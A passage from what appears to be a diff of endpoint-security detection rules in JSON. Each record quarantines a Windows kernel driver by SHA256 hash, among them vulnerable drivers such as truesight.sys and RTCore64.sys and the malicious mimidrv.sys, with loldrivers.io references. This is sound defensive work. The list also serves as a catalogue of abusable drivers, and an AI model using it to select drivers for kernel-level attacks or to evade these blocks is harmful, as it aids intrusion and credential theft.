+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830528Z",
+ "creation_date": "2026-03-23T11:45:30.830530Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e26f64ae78fe305565876b7c28b543fc086900fb41756c2c21a767d7aa3004e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "00f9d36c-45ee-59c9-982a-1e3a3612b049",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453548Z",
+ "creation_date": "2026-03-23T11:45:30.453552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453561Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe425d4ea7c8d8bc2e8f32969d058f06a02ab11a0e15e465b989e526be17ca84",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0101d602-6d30-5816-a914-ae5d5464a0db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155188Z",
+ "creation_date": "2026-03-23T11:45:31.155190Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f93092156ac39b5ff400cc1378edd5d74a96d0ec01fa2691ad678a49916bbb20",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01020362-84a7-5ae0-8498-32e1944fbd8d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143936Z",
+ "creation_date": "2026-03-23T11:45:32.143938Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143944Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "765869c7c04b49e77de313806398472ec90dce45206a6d71e448d4e2e499715d",
+ "comment": "Vulnerable Kernel Driver (aka Afd.sys) [https://www.loldrivers.io/drivers/394f49b2-2d78-4d0d-b374-1399695455f3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0107bfa0-5fac-5b43-bd30-6fc3ef784280",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497896Z",
+ "creation_date": "2026-03-23T11:45:31.497900Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497909Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2888b243fe734e4bd33e8bb7f92a39f005653c9bf0defca5d34ff150c6b0cb9c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "010e8b7d-18ae-5abe-a415-c39532ce008a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808704Z",
+ "creation_date": "2026-03-23T11:45:31.808706Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808712Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "73383892b9298fe716e2aa02fdf2e7d07169fa297fba3bb6090ec47fa648dae0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01161d5f-dfb7-5023-abd9-05f8e5b8f517",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822818Z",
+ "creation_date": "2026-03-23T11:45:30.822820Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822825Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39336e2ce105901ab65021d6fdc3932d3d6aab665fe4bd55aa1aa66eb0de32f0",
+ "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "012cb417-ac19-5fc3-9236-07ed24c46b07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823335Z",
+ "creation_date": "2026-03-23T11:45:31.823339Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823346Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b43a6483567a78f3f1158ca875a3dbcad3edfc024d2ccaeace03fb7be6db449e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01305fd2-188e-5e40-a33a-4d81a546af35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619750Z",
+ "creation_date": "2026-03-23T11:45:29.619752Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619757Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee6bfdf5748fbbf579d6176026626ef39a0673e307c2029f5633e80f0babef54",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01467ec8-c1bd-5919-a5ae-c16772a2fc74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146013Z",
+ "creation_date": "2026-03-23T11:45:31.146017Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146026Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c661ccb40bb80b66a8e376aaf8ed638c0860a606195cb3cb5b781b69a942534",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "014b2e74-f1de-525a-a953-c0f445c7db9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470727Z",
+ "creation_date": "2026-03-23T11:45:30.470730Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470739Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46aac78f7cd865d27189c8308841f12a5512e657be0dd6e8b178aac5223889fe",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0155c3ca-9d4c-5211-90ac-e0fe8711662c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488396Z",
+ "creation_date": "2026-03-23T11:45:31.488398Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488403Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6c906d3e5e00067ffe1b176bd94dbe8a119435039e3ac3ddfec326fc0956d77",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0157f476-c466-53d7-8670-1e244f9cdd26",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982449Z",
+ "creation_date": "2026-03-23T11:45:29.982451Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982457Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8",
+ "comment": "Vulnerable Kernel Driver (aka windows7-32.sys) [https://www.loldrivers.io/drivers/b45a3fdf-592a-4cd9-81e2-8fe03d554cad/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "016175ac-e9a7-57b5-a683-9e1053a9bd84",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827595Z",
+ "creation_date": "2026-03-23T11:45:30.827597Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827603Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54d5c4a62a2eed43d0e680587ec6f8063d1d48908b2ab4562816ffed8f52c263",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01659f83-3662-5629-be7b-1354117d1314",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147717Z",
+ "creation_date": "2026-03-23T11:45:31.147718Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147724Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec85aa2349c95884af3dfbfc8bfebd40a71963f107d1176b8891fde2b614b310",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0169ef2f-fb28-5bc3-bed7-b2aabb90dd7d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616569Z",
+ "creation_date": "2026-03-23T11:45:29.616571Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616577Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01733296-4ba1-5d5a-b233-79903da3bdfd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464939Z",
+ "creation_date": "2026-03-23T11:45:30.464942Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464957Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93aa3066ae831cdf81505e1bc5035227dc0e8f06ebbbb777832a17920c6a02fe",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "017447d4-88a2-5447-aa80-d987c13d331a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621333Z",
+ "creation_date": "2026-03-23T11:45:29.621335Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621340Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9dcfd796e244d0687cc35eac9538f209f76c6df12de166f19dbc7d2c47fb16b3",
+ "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0179b98d-3214-5d53-87b6-87143663638b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479974Z",
+ "creation_date": "2026-03-23T11:45:30.479976Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479981Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4658d93544f69f5cb9aa6d9fec420fecc8750cb57e1e9798da38c139d44f2eb",
+ "comment": "Vulnerable Kernel Driver (aka AsmIo64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "017c91ba-fe9d-5512-a44e-606373270abc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146099Z",
+ "creation_date": "2026-03-23T11:45:32.146101Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146106Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8dbc28fefb8cf9377be55a7c6062988df5a24f0ff475f6dd65cf07fe5173f51d",
+ "comment": "Vulnerable Kernel Driver (aka neofltr.sys) [https://www.loldrivers.io/drivers/c44e6197-efab-49d2-8a5f-04ae4a0f0ea0/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "01878dd6-bfc7-5836-855e-f2beabffc97b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460125Z",
+ "creation_date": "2026-03-23T11:45:30.460128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460136Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd2c1aa4e14c825f3715891bfa2b6264650a794f366d5f73ed1ef1d79ff0dbf9",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "018df02d-8389-5fa3-b401-d54fdda39937",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823979Z",
+ "creation_date": "2026-03-23T11:45:31.823982Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823991Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "090e352c8943316c242e1889f0e7304819d502300a529499a1fb29124ca33646",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0198378f-55b8-5f80-965b-d73b6859e7f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823389Z",
+ "creation_date": "2026-03-23T11:45:31.823393Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823401Z",
+ "rule_level": null,
+ "rule_level_override": null,
